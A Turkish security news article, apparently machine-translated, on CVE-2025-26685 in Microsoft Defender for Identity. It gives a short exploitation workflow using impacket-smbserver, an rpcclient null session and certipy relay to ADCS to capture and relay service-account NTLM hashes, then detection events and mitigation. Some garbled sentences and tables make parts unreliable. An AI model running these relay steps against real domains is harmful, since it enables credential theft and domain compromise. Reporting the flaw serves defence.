Microsoft Defender Sahtekarlık Kususu, ayrıcalık artış ve reklam erişimini sağlar


Kimlik için Microsoft Defender (MDI) ‘da yeni açıklanan bir sahtekarlık güvenlik açığı (CVE-2025-26685), kimlik doğrulanmamış saldırganların kritik dizin hizmet hesaplarının (DSA’ların net-ntlm karmalarını yakalamasını sağlar, bu da potansiyel olarak Active Directory ortamlarını tehlikeye atar.

CVSS v3.1 ölçeğinde 6.5 (orta) olarak derecelendirilen bu kusur, MDI’nın Lateral Hareket Yolları (LMPS) özelliğinden yararlanır ve Microsoft’un Mayıs 2025 Yaması Salı güncellemelerinde aktif olarak ele alınmıştır.

Teknik döküm

Rapora göre, güvenlik açığı MDI’nın LMP’leri haritalamak için SAM-R protokol sorgularını kullanmasından kaynaklanmaktadır-Active Directory’deki ayrıcalık artış yollarını görselleştirmek için tasarlanmış güvenlik özellikleri.

– Reklamcılık –
Google Haberleri

Saldırganlar, etki alanı denetleyicilerine anonim KOBİ bağlantıları başlatarak bu sorguları tetikleyebilir ve MDI sensörünü Kerberos yerine NTLM üzerinden kimlik doğrulamaya zorlar.

Anahtar Sömürü Gereksinimleri:

  • DNS kaydına sahip saldırgan kontrollü sistem (genellikle Windows DHCP aracılığıyla otomatik olarak oluşturulur)
  • SMB NULL Oturum Denemeleri sırasında Domain Denetleyicileri Üzerinde Windows Olay Kimliği 4672 Üretimi1

Sömürü iş akışı

Saldırganlar, çok aşamalı bir saldırı yürütmek için impaket ve sertifika gibi araçlardan yararlanır:

  1. Karma yakalama
bash# Initiate SMB listener
impacket-smbserver share $(pwd) -smb2support

# Trigger MDI sensor via SMB null session
rpcclient -U "" -N 10.0.0.1

Bu, MDI sensörünün DSA’sını net-ntlmv1/v2 karmaşasını ortaya çıkararak kimlik doğrulamaya zorlar.

  1. Karma röle (ESC8 güvenlik açığı aracılığıyla)
bash# Relay hash to ADCS Web Enrollment endpoint
certipy relay -target http://adcs-ca.domain.local

# Request certificate for DSA
certipy auth -pfx dsa_cert.pfx -dc-ip 10.0.0.1

Başarılı aktarma Saldırganları DSA ayrıcalıkları, yanal hareket sağlayarak.

Etki analizi

BileşenRisk
DSA HesaplarıKarma çatlama/aktarma yoluyla ayrıcalık artışı
Sertifika otoritesiKötü amaçlı sertifika verimi
Yanal hareketEşlenmiş LMP’lere sınırsız erişim

DSA’nın varsayılan izinleri-Active Directory’nin silinen nesneler konteynerine okuma erişimi de dahil olmak üzere saldırganların reklam topolojisini yeniden yapılandırmasına ve yüksek değerli hedefleri tanımlamasına izin verir.

Tespit stratejileri

Microsoft şu şekilde izlenmenizi önerir:

  1. Anormal DSA kimlik doğrulaması
    • Windows Olay Kimliği 4624 Alan dışı denetleyici IPS1’den
  2. ADCS Şablon numaralandırması metin(objectClass=certificationAuthority)(objectclass=pKICertificateTemplate)
  3. Sertifika tabanlı TGT istekleri
    • Windows Olay Kimliği 4768 Ön kimlik doğrulama tipi 161
ÇözümKlasik MDI sensörüBirleşik XDR Sensörü
Kimlik doğrulama protokolüSAM-R (NTLM/KERBEROS)WMI (sadece Kerberos)
LMP eşleme yöntemiYerel Yönetici SorgularıDavranışsal analitik
Güvenlik Açığı DurumuEtkilenenSavunmasız değil

Microsoft, XDR sensörlerine (v3. X+) geçişi zorunlu kılar:

  • Standart DSA hesaplarını Grup Yönetilen Hizmet Hesapları (GMSAS) ile değiştirme
  • Altyapı ile uyumsuzsa LMP’leri destek isteği yoluyla devre dışı bırakma
powershell# Convert DSA to gMSA
New-MDIDSA -Identity "DefenderIdentity" -ForceStandardAccount:$false

Bu güvenlik açığı, güvenlik ürünlerinde aşırı bırakılan hizmet hesaplarının risklerini vurgulamaktadır.

Yamalar acil tehditleri hafifletirken, kuruluşlar üçüncü taraf güvenlik araçlarının reklam entegrasyonlarını denetlemeli ve katı NTLM rölesi korumalarını uygulamalıdır.

MDI’nın LMP’leri ve ADCS güvenlik açıklarının kesişimi, zincirlenmiş istismarların orta yüzlük kusurlarını nasıl alan çapında uzlaşmaya dönüştürebileceğini göstermektedir.

Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin



Source link